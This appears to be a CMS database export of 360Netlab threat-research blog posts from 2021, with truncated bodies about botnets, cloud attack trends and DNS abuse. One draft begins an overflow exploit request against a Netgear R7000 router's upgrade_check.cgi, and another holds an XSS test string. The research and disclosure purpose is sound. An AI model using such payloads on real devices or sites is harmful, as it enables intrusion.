{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## 360 DNS威胁分析平台\n"}],["image",{"src":"__GHOST_URL__/content/images/2021/10/815AF727-176B-4452-BDF8-8A49B9D73094.png","cardWidth":""}],["markdown",{"markdown":"* **让情报发挥应有价值**"}],["image",{"src":"__GHOST_URL__/content/images/2021/10/360-DTA-investigate.gif...
6168ed373819e500076354b0
post
null
2021-10-19T09:18:16.000Z
63873b9a8b1c1e0007f52fe9
qcss-kuai-xun
0
2021-12-22T04:49:20.000Z
public
draft
null
null
Minav 威胁快讯
<!--kg-card-begin: markdown--><h1 id="exploit">Exploit</h1> <ul> <li> <p>攻击目标:是网件路由器,Netgear_R7000。</p> </li> <li> <p>攻击载荷:</p> </li> </ul> <pre><code>POST /upgrade_check.cgi HTTP/1.1 Host: xxxxxxxx Content-Disposition: AAAA Content-Length: 1575 Content-Type: application/octet-stream name=&quot;mtenFWUpload&quot; *#$^...
Exploit * 攻击目标:是网件路由器,Netgear_R7000。 * 攻击载荷: POST /upgrade_check.cgi HTTP/1.1 Host: xxxxxxxx Content-Disposition: AAAA Content-Length: 1575 Content-Type: application/octet-stream name="mtenFWUpload" *#$^....AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"# Exploit\n\n* 攻击目标:是网件路由器,Netgear_R7000。\n\n* 攻击载荷:\n```\nPOST /upgrade_check.cgi HTTP/1.1\nHost: xxxxxxxx\nContent-Disposition: AAAA\nContent-Length: 1575\nContent-Type: application/octet-stream\nname=\"mtenFWUpload\"\n\n*#$^....AAAAAAAAAAAAAAAAAAAAAAAAA...
616e8d583819e500076356fb
post
null
2021-10-21T03:05:42.000Z
63873b9a8b1c1e0007f52fea
pink-botnet-bei-fen
0
2022-03-01T07:28:55.000Z
public
draft
null
null
(备份-嫑改)Pink Botnet
<!--kg-card-begin: markdown--><h1 id="">概述</h1> <p>2019年11月21日,安全社区的信任伙伴给我们提供了一个全新的僵尸网络样本,相关样本中包含大量以 pink 为首的函数名,所以我们称之为 PinkBot。</p> <p>Pinkbot 是我们六年以来观测到最大的僵尸网络,其攻击目标主要是 mips 光猫设备,已知总感染量超过160万,其中 96% 位于中国。</p> <p>PinkBot 具有很强的技术能力:</p> <ol> <li>PinkBot 架构设计具备很好的健壮性,它能够通过多种方式(通过第三方服务分发配置信息/通过 P2P 方式分发配置信息/通过 CNC 分发配置信...
概述 2019年11月21日,安全社区的信任伙伴给我们提供了一个全新的僵尸网络样本,相关样本中包含大量以 pink 为首的函数名,所以我们称之为 PinkBot。 Pinkbot 是我们六年以来观测到最大的僵尸网络,其攻击目标主要是 mips 光猫设备,已知总感染量超过160万,其中 96% 位于中国。 PinkBot 具有很强的技术能力: 1. PinkBot 架构设计具备很好的健壮性,它能够通过多种方式(通过第三方服务分发配置信息/通过 P2P 方式分发配置信息/通过 CNC 分发配置信息)自发寻址控制端,并对控制端通信有完备的校验,确保僵尸节点不会因某一个环节的阻杀而丢失或被接管;甚至对光猫固件做了多处改动后...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"# 概述\n2019年11月21日,安全社区的信任伙伴给我们提供了一个全新的僵尸网络样本,相关样本中包含大量以 pink 为首的函数名,所以我们称之为 PinkBot。\n\nPinkbot 是我们六年以来观测到最大的僵尸网络,其攻击目标主要是 mips 光猫设备,已知总感染量超过160万,其中 96% 位于中国。\n\nPinkBot 具有很强的技术能力:\n\n1. PinkBot 架构设计具备很好的健壮性,它能够通过多种方式(通过第三方服务分发配置信息/通过 P2P 方式分发配置信息/通过 CNC 分...
6170d9063819e50007635909
post
null
2021-10-28T02:25:26.000Z
63873b9a8b1c1e0007f52feb
pink-en
0
2021-10-29T13:02:49.000Z
public
published
null
2021-10-29T13:02:49.000Z
Pink, a botnet that competed with the vendor to control the massive infected devices
<!--kg-card-begin: markdown--><p>Most of the following article was completed around early 2020, at that time the vendor was trying different ways to recover the massive amount of infected devices, we shared our findings with the vendor, as well as to CNCERT, and decided to not publish the blog while the vendor's workin...
Most of the following article was completed around early 2020, at that time the vendor was trying different ways to recover the massive amount of infected devices, we shared our findings with the vendor, as well as to CNCERT, and decided to not publish the blog while the vendor's working was in progress. Last week, CNC...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"Most of the following article was completed around early 2020, at that time the vendor was trying different ways to recover the massive amount of infected devices, we shared our findings with the vendor, as well as to CNCERT, and decided to not publish the...
617a0a163819e500076359e8
post
null
2021-11-04T10:11:25.000Z
63873b9a8b1c1e0007f52fec
abcbot_an_evolving_botnet_cn
0
2021-11-09T09:03:13.000Z
public
published
null
2021-11-09T08:47:24.000Z
僵尸网络Abcbot的进化之路
<!--kg-card-begin: markdown--><h1 id="">背景</h1> <p>业务上云、安全上云是近年来业界的发展趋势之一。360Netlab 从自身擅长的技术领域出发,也在持续关注云上安全事件和趋势。下面就是我们近期观察到的一起,被感染设备IP来自多个云供应商平台的安全事件。</p> <p>2021年7月14日,360BotMon系统发现一个未知的ELF文件(a14d0188e2646d236173b230c59037c7)产生了大量扫描流量,经过分析,我们确定这是一个Go语言实现的Scanner,基于其源码路径中&quot;abc-hello&quot;字串,我们内部将它命名为<code>Abcbot</...
背景 业务上云、安全上云是近年来业界的发展趋势之一。360Netlab 从自身擅长的技术领域出发,也在持续关注云上安全事件和趋势。下面就是我们近期观察到的一起,被感染设备IP来自多个云供应商平台的安全事件。 2021年7月14日,360BotMon系统发现一个未知的ELF文件(a14d0188e2646d236173b230c59037c7)产生了大量扫描流量,经过分析,我们确定这是一个Go语言实现的Scanner,基于其源码路径中"abc-hello"字串,我们内部将它命名为Abcbot。 Abcbot在当时的时间节点上功能比较简单,可以看成是一个攻击Linux系统的扫描器,通过弱口令&Nday漏洞实现蠕虫式传播。一个...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"\n\n# 背景\n业务上云、安全上云是近年来业界的发展趋势之一。360Netlab 从自身擅长的技术领域出发,也在持续关注云上安全事件和趋势。下面就是我们近期观察到的一起,被感染设备IP来自多个云供应商平台的安全事件。\n\n2021年7月14日,360BotMon系统发现一个未知的ELF文件(a14d0188e2646d236173b230c59037c7)产生了大量扫描流量,经过分析,我们确定这是一个Go语言实现的Scanner,基于其源码路径中\"abc-hello\"字串,我们内部将它命名为```...
6183b1cd3819e50007635bcb
post
null
2021-11-04T10:38:29.000Z
63873b9a8b1c1e0007f52fed
untitled-14
0
2021-11-04T10:40:13.000Z
public
draft
null
null
Domain Parking ,Google sites,Malware Payload
null
null
{"version":"0.3.1","atoms":[],"cards":[],"markups":[],"sections":[[1,"p",[]]],"ghostVersion":"3.0"}
6183b8253819e50007635c19
post
null
2021-11-09T07:30:04.000Z
63873b9a8b1c1e0007f52fee
abcbot_an_evolving_botnet_en
0
2021-11-09T13:59:59.000Z
public
published
null
2021-11-09T14:00:00.000Z
Abcbot, an evolving botnet
<!--kg-card-begin: markdown--><h1 id="background">Background</h1> <p>Business on the cloud and security on the cloud is one of the industry trends in recent years. 360Netlab is also continuing to focus on security incidents and trends on the cloud from its own expertise in the technology field. The following is a recen...
Background Business on the cloud and security on the cloud is one of the industry trends in recent years. 360Netlab is also continuing to focus on security incidents and trends on the cloud from its own expertise in the technology field. The following is a recent security incident we observed, where the infected devi...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"# Background\nBusiness on the cloud and security on the cloud is one of the industry trends in recent years. 360Netlab is also continuing to focus on security incidents and trends on the cloud from its own expertise in the technology field. The following i...
618a237c3819e50007635d57
post
null
2021-11-10T03:49:44.000Z
63873b9a8b1c1e0007f52fef
li-yong-namesilo-parkinghe-googlede-zi-ding-yi-ye-mian-lai-chuan-bo-e-yi-ruan-jian
0
2021-11-11T07:56:31.000Z
public
published
null
2021-11-11T03:48:09.000Z
快讯:利用namesilo Parking和Google的自定义页面来传播恶意软件
<!--kg-card-begin: markdown--><h3 id="">摘要</h3> <p>近期,我们发现一个GoELF可疑样本,分析得知是一个downloder,主要传播挖矿。有意思的地方在于传播方式,利用了namesilo的Parking页面,以及Google的用户自定义页面来传播样本及配置,从而可以躲避跟踪。</p> <p>该样本最开始被友商腾讯安全团队捕获,不过传播链条分析中,对namesilo parking域名的分析不太准确。往往大家以为,域名停靠期间(Domain Parking),页面显示内容是被域名停靠供应商强制限定的,域名实际拥有者并不能修改其页面内容。但在这个案例中,域名停靠供应商允许域名拥有者自定义...
摘要 近期,我们发现一个GoELF可疑样本,分析得知是一个downloder,主要传播挖矿。有意思的地方在于传播方式,利用了namesilo的Parking页面,以及Google的用户自定义页面来传播样本及配置,从而可以躲避跟踪。 该样本最开始被友商腾讯安全团队捕获,不过传播链条分析中,对namesilo parking域名的分析不太准确。往往大家以为,域名停靠期间(Domain Parking),页面显示内容是被域名停靠供应商强制限定的,域名实际拥有者并不能修改其页面内容。但在这个案例中,域名停靠供应商允许域名拥有者自定义停靠页面。攻击者利用了这一点,再加上Google提供的自定义页面来传播自己的木马。 这样做有两个显...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"### 摘要\n\n近期,我们发现一个GoELF可疑样本,分析得知是一个downloder,主要传播挖矿。有意思的地方在于传播方式,利用了namesilo的Parking页面,以及Google的用户自定义页面来传播样本及配置,从而可以躲避跟踪。\n\n该样本最开始被友商腾讯安全团队捕获,不过传播链条分析中,对namesilo parking域名的分析不太准确。往往大家以为,域名停靠期间(Domain Parking),页面显示内容是被域名停靠供应商强制限定的,域名实际拥有者并不能修改其页面内容。但在这个案例...
618b41583819e50007635df7
post
null
2021-11-12T02:07:10.000Z
63873b9a8b1c1e0007f52ff0
zhatuniubility-malware-uses-namesilo-parking-pages-and-googles-custom-pages-to-spread
0
2021-11-12T13:59:59.000Z
public
published
null
2021-11-12T14:00:00.000Z
Malware uses namesilo Parking pages and Google's custom pages to spread
<h4 id="abstract">Abstract</h4><p>Recently, we found a suspicious GoELFsample, which is a downloder mainly to spread mining malwares. The interesting part is that we noticed it using namesilo's Parking page and Google's user-defined page to spread the sample and configuration. Apparently this is yet another attempt to ...
Abstract Recently, we found a suspicious GoELFsample, which is a downloder mainly to spread mining malwares. The interesting part is that we noticed it using namesilo's Parking page and Google's user-defined page to spread the sample and configuration. Apparently this is yet another attempt to hide control channel to ...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"On 10.13, our BotnetMon IDed a suspicious GoELF sample that would request a known suspicious domain www[.]hellomeyou.cyou, which Tencent had covered in a [previous mining malware report](https://s.tencent.com/research/report/1219.html). "}],["markdown",{"m...
618dcc4e3819e50007635e9b
post
null
2021-11-15T08:49:34.000Z
63873b9a8b1c1e0007f52ff1
specter-domain-whitelist-abuse
0
2021-11-18T03:49:10.000Z
public
published
null
2021-11-18T03:07:22.000Z
白名单之殇:Specter僵尸网络滥用ClouDNS服务,github.com无辜躺枪
<!--kg-card-begin: markdown--><h3 id="">摘要</h3> <p>威胁情报的应用,始终存在着“漏报”和“误报”的平衡,为了减少可能的误报带来的业务影响,你的威胁情报白名单中是否静静的躺着 www.apple.com、www.qq.com、www.alipay.com 这样的流行互联网业务域名呢?你的机器学习检测模型,依照历史流量,是否会自动对 <em>.qq.com、</em>.alipay.com 这样的流量行为增加白权重呢?</p> <p>但安全是对抗,白帽子想“判黑”,黑客想“洗白”。我们看到的白,不一定是真的白,可能只是黑客想让我们以为的白。</p> <p>我们BotnetMon最近的跟踪...
摘要 威胁情报的应用,始终存在着“漏报”和“误报”的平衡,为了减少可能的误报带来的业务影响,你的威胁情报白名单中是否静静的躺着 www.apple.com、www.qq.com、www.alipay.com 这样的流行互联网业务域名呢?你的机器学习检测模型,依照历史流量,是否会自动对 .qq.com、.alipay.com 这样的流量行为增加白权重呢? 但安全是对抗,白帽子想“判黑”,黑客想“洗白”。我们看到的白,不一定是真的白,可能只是黑客想让我们以为的白。 我们BotnetMon最近的跟踪发现,Specter僵尸网络家族的样本,会使用api.github.com这种域名作为CC域名来通信,通过“可定制化”的DNS服务...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"### 摘要\n威胁情报的应用,始终存在着“漏报”和“误报”的平衡,为了减少可能的误报带来的业务影响,你的威胁情报白名单中是否静静的躺着 www.apple.com、www.qq.com、www.alipay.com 这样的流行互联网业务域名呢?你的机器学习检测模型,依照历史流量,是否会自动对 *.qq.com、*.alipay.com 这样的流量行为增加白权重呢?\n\n但安全是对抗,白帽子想“判黑”,黑客想“洗白”。我们看到的白,不一定是真的白,可能只是黑客想让我们以为的白。\n\n我们BotnetMo...
61921f1e3819e50007635ec5
post
null
2021-11-18T03:50:28.000Z
63873b9a8b1c1e0007f52ff2
the-pitfall-of-threat-intelligence-whitelisting-specter-botnet-is-taking-over-top-legit-dns-domains-by-using-cloudns-service
0
2021-11-18T14:00:00.000Z
public
published
null
2021-11-18T14:00:00.000Z
The Pitfall of Threat Intelligence Whitelisting: Specter Botnet is 'taking over' Top Legit DNS Domains By Using ClouDNS Service
<!--kg-card-begin: markdown--><h3 id="abstract">Abstract</h3> <p>In order to reduce the possible impact of false positives, it is pretty common practice for security industry to whitelist the top Alexa domains such as <code>www.google.com</code>, <code>www.apple.com</code>, <code>www.qq.com</code>, <code>www.alipay.co...
Abstract In order to reduce the possible impact of false positives, it is pretty common practice for security industry to whitelist the top Alexa domains such as www.google.com, www.apple.com, www.qq.com, www.alipay.com. And we have seen various machine learning detection models that bypass data when they sees these...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"### Abstract\n\nIn order to reduce the possible impact of false positives, it is pretty common practice for security industry to whitelist the top Alexa domains such as `www.google.com`, `www.apple.com`, `www.qq.com`, `www.alipay.com`.\nAnd we have seen v...
6195cd843819e500076361e3
post
null
2021-11-19T06:37:06.000Z
63873b9a8b1c1e0007f52ff3
public-cloud-threat-intelligence-202110-bak
0
2021-11-25T03:41:57.000Z
public
draft
null
null
公有云网络安全威胁情报(202110):云上关键基础设施对外发起FTP暴力破解攻击
<h1 id="1-">1 概述</h1><p>云计算服务价格低廉,部署快捷方便,但存在安全风险。黑客可以用虚假信息购买,或入侵他人机器获得云资源,用这些资源窃取、勒索原有用户的数据,或用于发起DDoS攻击、发送垃圾和钓鱼邮件、虚拟货币挖矿、刷单、违法代理和传播僵尸网络木马等其他恶意行为。</p><p>360网络安全研究院 Anglerfish蜜罐(以下简称“蜜罐系统”)通过模拟仿真技术伪装成针对互联网、物联网以及工业互联网的指纹特征、应用协议、应用程序和漏洞,捕获并分析网络扫描和网络攻击行为。在2021年10月,我们共监测到来自全球58253个云服务器IP共计9213万次的网络扫描和攻击,其中发现阿里云上网站“<strong>某市...
1 概述 云计算服务价格低廉,部署快捷方便,但存在安全风险。黑客可以用虚假信息购买,或入侵他人机器获得云资源,用这些资源窃取、勒索原有用户的数据,或用于发起DDoS攻击、发送垃圾和钓鱼邮件、虚拟货币挖矿、刷单、违法代理和传播僵尸网络木马等其他恶意行为。 360网络安全研究院 Anglerfish蜜罐(以下简称“蜜罐系统”)通过模拟仿真技术伪装成针对互联网、物联网以及工业互联网的指纹特征、应用协议、应用程序和漏洞,捕获并分析网络扫描和网络攻击行为。在2021年10月,我们共监测到来自全球58253个云服务器IP共计9213万次的网络扫描和攻击,其中发现阿里云上网站“某市供排水总公司”持续地对外发起网络攻击行为。 2 云服务器攻...
{"version":"0.3.1","atoms":[],"cards":[["image",{"src":"__GHOST_URL__/content/images/2021/11/1.png"}],["image",{"src":"__GHOST_URL__/content/images/2021/11/2.png"}],["image",{"src":"__GHOST_URL__/content/images/2021/11/---IP----202110.png","cardWidth":""}],["image",{"src":"__GHOST_URL__/content/images/2021/11/3.png"}],...
619746123819e5000763623a
post
null
2021-11-24T10:34:13.000Z
63873b9a8b1c1e0007f52ff4
public-cloud-threat-intelligence-202110
0
2022-02-09T07:17:15.000Z
public
published
null
2021-11-25T03:57:29.000Z
公有云网络安全威胁情报(202110):趋势及典型案例分析
<h2 id="1-">1 概述</h2><p>云计算服务价格低廉,部署快捷方便,但存在安全风险。黑客可以用虚假信息购买,或入侵他人机器获得云资源,用这些资源窃取、勒索原有用户的数据,或用于发起DDoS攻击、发送垃圾和钓鱼邮件、虚拟货币挖矿、刷单、违法代理和传播僵尸网络木马等其他恶意行为。</p><p>360网络安全研究院 Anglerfish蜜罐(以下简称“蜜罐系统”)通过模拟仿真技术伪装成针对互联网、物联网以及工业互联网的指纹特征、应用协议、应用程序和漏洞,捕获并分析网络扫描和网络攻击行为。在2021年10月,我们共监测到来自全球58253个云服务器IP共计9213万次的网络扫描和攻击,其中发现云上网站“<strong>某市供排...
1 概述 云计算服务价格低廉,部署快捷方便,但存在安全风险。黑客可以用虚假信息购买,或入侵他人机器获得云资源,用这些资源窃取、勒索原有用户的数据,或用于发起DDoS攻击、发送垃圾和钓鱼邮件、虚拟货币挖矿、刷单、违法代理和传播僵尸网络木马等其他恶意行为。 360网络安全研究院 Anglerfish蜜罐(以下简称“蜜罐系统”)通过模拟仿真技术伪装成针对互联网、物联网以及工业互联网的指纹特征、应用协议、应用程序和漏洞,捕获并分析网络扫描和网络攻击行为。在2021年10月,我们共监测到来自全球58253个云服务器IP共计9213万次的网络扫描和攻击,其中发现云上网站“某市供排水总公司”持续地对外发起网络攻击行为。 2 云服务器攻击总...
{"version":"0.3.1","atoms":[],"cards":[["image",{"src":"__GHOST_URL__/content/images/2021/11/1.png"}],["image",{"src":"__GHOST_URL__/content/images/2021/11/2.png"}],["image",{"src":"__GHOST_URL__/content/images/2021/11/---IP----202110.png","cardWidth":""}],["html",{"html":"<div align=\"center\">\n\n<table class=\"MsoTa...
619e15253819e500076362e3
post
null
2021-11-25T07:42:11.000Z
63873b9a8b1c1e0007f52ff5
warning-ewdoor-botnet-is-attacking-att-customers_cn
0
2021-12-09T08:53:43.000Z
public
published
null
2021-12-01T03:12:04.000Z
EwDoor僵尸网络,正在攻击美国AT&T用户
<!--kg-card-begin: markdown--><h2 id="">背景介绍</h2> <p>2021年10月27日,我们的BotMon系统发现有攻击者正通过CVE-2017-6079漏洞攻击Edgewater Networks设备,其payload里有比较罕见的mount文件系统指令,这引起了我们的兴趣,经过分析,我们确认这是一个全新的僵尸网络家族,基于其针对Edgewater产商、并且有Backdoor的功能,我们将它命名为<strong>EwDoor</strong>。</p> <p>最初捕获的EwDoor使用了常见的硬编码C2方法,同时采用了冗余机制,单个样本的C2多达14个。Bot运行后会依次向列表中的C2发起...
背景介绍 2021年10月27日,我们的BotMon系统发现有攻击者正通过CVE-2017-6079漏洞攻击Edgewater Networks设备,其payload里有比较罕见的mount文件系统指令,这引起了我们的兴趣,经过分析,我们确认这是一个全新的僵尸网络家族,基于其针对Edgewater产商、并且有Backdoor的功能,我们将它命名为EwDoor。 最初捕获的EwDoor使用了常见的硬编码C2方法,同时采用了冗余机制,单个样本的C2多达14个。Bot运行后会依次向列表中的C2发起网络请求直到成功建立C2会话。这些C2中多数为域名形式,有趣的是它们多数还未来得及注册,因此我们抢注了第二个域名iunno.se以获取B...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## 背景介绍\n2021年10月27日,我们的BotMon系统发现有攻击者正通过CVE-2017-6079漏洞攻击Edgewater Networks设备,其payload里有比较罕见的mount文件系统指令,这引起了我们的兴趣,经过分析,我们确认这是一个全新的僵尸网络家族,基于其针对Edgewater产商、并且有Backdoor的功能,我们将它命名为**EwDoor**。\n\n最初捕获的EwDoor使用了常见的硬编码C2方法,同时采用了冗余机制,单个样本的C2多达14个。Bot运行后会依次向列表中的C...
619f3e533819e5000763635b
post
null
2021-11-29T02:54:33.000Z
63873b9a8b1c1e0007f52ff6
warning-ewdoor-botnet-is-attacking-att-customers
0
2021-12-09T08:54:24.000Z
public
published
null
2021-11-30T14:00:00.000Z
EwDoor Botnet Is Attacking AT&T Customers
<!--kg-card-begin: markdown--><h2 id="background">Background</h2> <p>On October 27, 2021, our Botmon system ided an attacker attacking Edgewater Networks' devices via CVE-2017-6079 with a relatively unique <code>mount file system command</code> in its payload, which had our attention, and after analysis, we confirmed t...
Background On October 27, 2021, our Botmon system ided an attacker attacking Edgewater Networks' devices via CVE-2017-6079 with a relatively unique mount file system command in its payload, which had our attention, and after analysis, we confirmed that this was a brand new botnet, and based on it's targeting of Edgew...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## Background\nOn October 27, 2021, our Botmon system ided an attacker attacking Edgewater Networks' devices via CVE-2017-6079 with a relatively unique ``mount file system command`` in its payload, which had our attention, and after analysis, we confirmed ...
61a440e93819e500076364ae
post
null
2021-11-29T04:32:20.000Z
63873b9a8b1c1e0007f52ff7
analysis-of-popular-domain-names-by-non-authorized-resolvers
0
2021-12-06T04:35:13.000Z
public
published
null
2021-12-06T04:35:13.000Z
解析服务提供商对非授权域名解析情况的评估
<!--kg-card-begin: markdown--><h2 id="">概要</h2> <p>在<a href="__GHOST_URL__/specter-domain-whitelist-abuse/">之前的文章</a>中,我们披露了Specter僵尸网络序利用api[.]github.com等白域名提供C2服务,以此来逃避基于签名和威胁情报匹配的安全产品的检测。其具体原理经过分析之后,发现其利用了某些域名注册/托管商(cloudns)的权威DNS服务器在解析非其客户域名方面的漏洞。<br> 我们对此现象,即域名注册/托管商,公有云提供商等能够提供域名注册和解析服务的供应商(以下统称为解析服务提供商)对非自己服务域名的...
概要 在之前的文章中,我们披露了Specter僵尸网络序利用api[.]github.com等白域名提供C2服务,以此来逃避基于签名和威胁情报匹配的安全产品的检测。其具体原理经过分析之后,发现其利用了某些域名注册/托管商(cloudns)的权威DNS服务器在解析非其客户域名方面的漏洞。 我们对此现象,即域名注册/托管商,公有云提供商等能够提供域名注册和解析服务的供应商(以下统称为解析服务提供商)对非自己服务域名的DNS请求是否能够返回正确应答的情况,进行了系统的测量和评估。 这篇文章对此现象进行了分析。 数据选择及评估方法 被测域名 被测试域名:Alexa top500。选择他们作为被测域是因为: 1...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## 概要\n在[之前的文章](__GHOST_URL__/specter-domain-whitelist-abuse/)中,我们披露了Specter僵尸网络序利用api[.]github.com等白域名提供C2服务,以此来逃避基于签名和威胁情报匹配的安全产品的检测。其具体原理经过分析之后,发现其利用了某些域名注册/托管商(cloudns)的权威DNS服务器在解析非其客户域名方面的漏洞。\n我们对此现象,即域名注册/托管商,公有云提供商等能够提供域名注册和解析服务的供应商(以下统称为解析服务提供商)对非自...
61a457d43819e50007636589
post
null
2021-11-30T05:33:21.000Z
63873b9a8b1c1e0007f52ff8
untitled-15
0
2021-11-30T05:33:49.000Z
public
draft
null
null
(Untitled)
<!--kg-card-begin: markdown--><script>alert(1)</script><!--kg-card-end: markdown-->
null
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"<script>alert(1)</script>"}]],"markups":[],"sections":[[10,0],[1,"p",[]]],"ghostVersion":"3.0"}
61a5b7a13819e500076367c6
post
null
2021-12-03T03:18:07.000Z
63873b9a8b1c1e0007f52ff9
public-cloud-threat-intelligence-202111
0
2022-06-24T03:47:18.000Z
public
published
null
2021-12-09T06:49:53.000Z
公有云网络安全威胁情报(202111):云上多个资源对外发起攻击
<h2 id="1-">1 概述</h2><p>2021年11月,360网络安全研究院 Anglerfish蜜罐(以下简称“蜜罐系统”)共监测到全球53745个云服务器发起的网络会话9016万次,与10月份的数据相比略有下降,IP数量下降7.7%,会话数量下降2.1%。本月我们发现了涉及政府、事业单位、新闻媒体等多个行业的单位的8个云服务器IP地址在互联网上发起扫描和攻击。</p><h2 id="2-">2 云服务器攻击总体情况</h2><p>11月22日~24日的突增主要是由以下两个IP地址造成的:一个是腾讯云119.45.229.133,在11月22~24日每天向蜜罐系统发送了数十万个敏感文件嗅探数据包以及上千个微软OMI漏洞探...
1 概述 2021年11月,360网络安全研究院 Anglerfish蜜罐(以下简称“蜜罐系统”)共监测到全球53745个云服务器发起的网络会话9016万次,与10月份的数据相比略有下降,IP数量下降7.7%,会话数量下降2.1%。本月我们发现了涉及政府、事业单位、新闻媒体等多个行业的单位的8个云服务器IP地址在互联网上发起扫描和攻击。 2 云服务器攻击总体情况 11月22日~24日的突增主要是由以下两个IP地址造成的:一个是腾讯云119.45.229.133,在11月22~24日每天向蜜罐系统发送了数十万个敏感文件嗅探数据包以及上千个微软OMI漏洞探测数据包。另一个是位于荷兰的DigitalOcean云服务器188.166...
{"version":"0.3.1","atoms":[],"cards":[["image",{"src":"__GHOST_URL__/content/images/2021/12/1.png","caption":"2021年11月攻击源IP数量和会话数量趋势(按天统计)"}],["image",{"src":"__GHOST_URL__/content/images/2021/12/image.png","caption":"各云服务商的服务器被用于对外发起攻击情况"}],["html",{"html":"<div align=\"center\">\n\n<table class=\"MsoTable15Grid4Acce...
61a98c6f3819e5000763689a
post
null
2021-12-03T06:27:40.000Z
63873b9a8b1c1e0007f52ffa
gong-you-yun-wang-luo-an-quan-wei-xie-qing-bao-202111-duo-qi-zhong-dian-dan-wei-yun-shang-zi-yuan-dui-wai-fa-qi-gong-ji
0
2021-12-03T06:28:55.000Z
public
draft
null
null
公有云网络安全威胁情报(202111):多起重点单位云上资源对外发起攻击
<h2 id="1-">1 概述</h2><p>2021年11月,360网络安全研究院 Anglerfish蜜罐(以下简称“蜜罐系统”)共监测到全球53745个云服务器发起的网络会话9016万次,与10月份的数据相比略有下降,IP数量下降7.7%,会话数量下降2.1%。但是,本月我们发现了多起重点单位的云上资产对外发起攻击事件,涉及<strong>政府机关、公共事业、通信、交通运输、工业制造、医疗卫生、传媒、农业8个行业的8个IP地址</strong>。值得关注的是我们发现了<strong>中国电信邮箱服务器</strong>和<strong>多地政府机关食堂订餐系统</strong>可能被黑客入侵。</p><h2 id="2-">...
1 概述 2021年11月,360网络安全研究院 Anglerfish蜜罐(以下简称“蜜罐系统”)共监测到全球53745个云服务器发起的网络会话9016万次,与10月份的数据相比略有下降,IP数量下降7.7%,会话数量下降2.1%。但是,本月我们发现了多起重点单位的云上资产对外发起攻击事件,涉及政府机关、公共事业、通信、交通运输、工业制造、医疗卫生、传媒、农业8个行业的8个IP地址。值得关注的是我们发现了中国电信邮箱服务器和多地政府机关食堂订餐系统可能被黑客入侵。 2 云服务器攻击总体情况 从时间趋势上看,11月份大多数时间每天具有攻击行为云服务器IP地址仍然在600~1000个范围内,整体上看云服务器攻击源IP数量随着时间...
{"version":"0.3.1","atoms":[],"cards":[["image",{"src":"__GHOST_URL__/content/images/2021/12/1.png"}],["image",{"src":"__GHOST_URL__/content/images/2021/12/11------.png"}],["image",{"src":"__GHOST_URL__/content/images/2021/12/11-------1.png"}],["image",{"src":"__GHOST_URL__/content/images/2021/12/image.png"}],["html",{...
61a9b8dc3819e5000763698f
post
null
2021-12-08T02:09:53.000Z
63873b9a8b1c1e0007f52ffb
an-assessment-of-non-authorized-domain-name-resolution-provided-by-dns-resolution-service-provider
0
2021-12-08T02:53:43.000Z
public
published
null
2021-12-08T02:53:43.000Z
An assessment of Non-Authorized Domain Name Resolution provided by DNS Resolution Service Provider
<!--kg-card-begin: markdown--><h2 id="summary">Summary</h2> <p>In a <a href="__GHOST_URL__/the-pitfall-of-threat-intelligence-whitelisting-specter-botnet-is-taking-over-top-legit-dns-domains-by-using-cloudns-service/">previous article</a>, we disclosed that the Specter botnet uses api. github[.]com and other white doma...
Summary In a previous article, we disclosed that the Specter botnet uses api. github[.]com and other white domains to provide C2 services as a way to evade detection by security products based on signature and threat intelligence matching. The botnet can do this because the Domain Name Resolution provider have no che...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## Summary\nIn a [previous article](__GHOST_URL__/the-pitfall-of-threat-intelligence-whitelisting-specter-botnet-is-taking-over-top-legit-dns-domains-by-using-cloudns-service/), we disclosed that the Specter botnet uses api. github[.]com and other white do...
61b013f13819e50007636bd7
post
null
2021-12-11T11:13:24.000Z
63873b9a8b1c1e0007f52ffc
wei-xie-kuai-xun-log4jlou-dong-yi-jing-bei-yong-lai-zu-jian-botnet-zhen-dui-linuxshe-bei
0
2022-02-09T07:05:18.000Z
public
published
null
2021-12-11T13:14:29.000Z
威胁快讯:Log4j漏洞已经被用来组建botnet,针对Linux设备
<p>年末曝光的Log4j漏洞无疑可以算是今年的安全界大事了。作为专注于蜜罐和botnet检测跟踪的团队,我们自该漏洞被公开后就一直关注它会被哪些botnet利用。今早我们等来了首批答案,我们的Anglerfish和Apacket蜜罐先后捕获到2波利用Log4j漏洞组建botnet的攻击,快速的样本分析表明它们分别用于组建 Muhstik 和Mirai botnet,针对的都是Linux设备。</p><!--kg-card-begin: markdown--><h2 id="">样本分析</h2> <h3 id="mirai">MIRAI</h3> <p>这一波传播的为miria新变种,相比最初代码,它做了如下变动:</p> <ol...
年末曝光的Log4j漏洞无疑可以算是今年的安全界大事了。作为专注于蜜罐和botnet检测跟踪的团队,我们自该漏洞被公开后就一直关注它会被哪些botnet利用。今早我们等来了首批答案,我们的Anglerfish和Apacket蜜罐先后捕获到2波利用Log4j漏洞组建botnet的攻击,快速的样本分析表明它们分别用于组建 Muhstik 和Mirai botnet,针对的都是Linux设备。 样本分析 MIRAI 这一波传播的为miria新变种,相比最初代码,它做了如下变动: 1. 移除了 table_init/table_lock_val/table_unlock_val 等mirai特有的配置管理函数。 2. ...
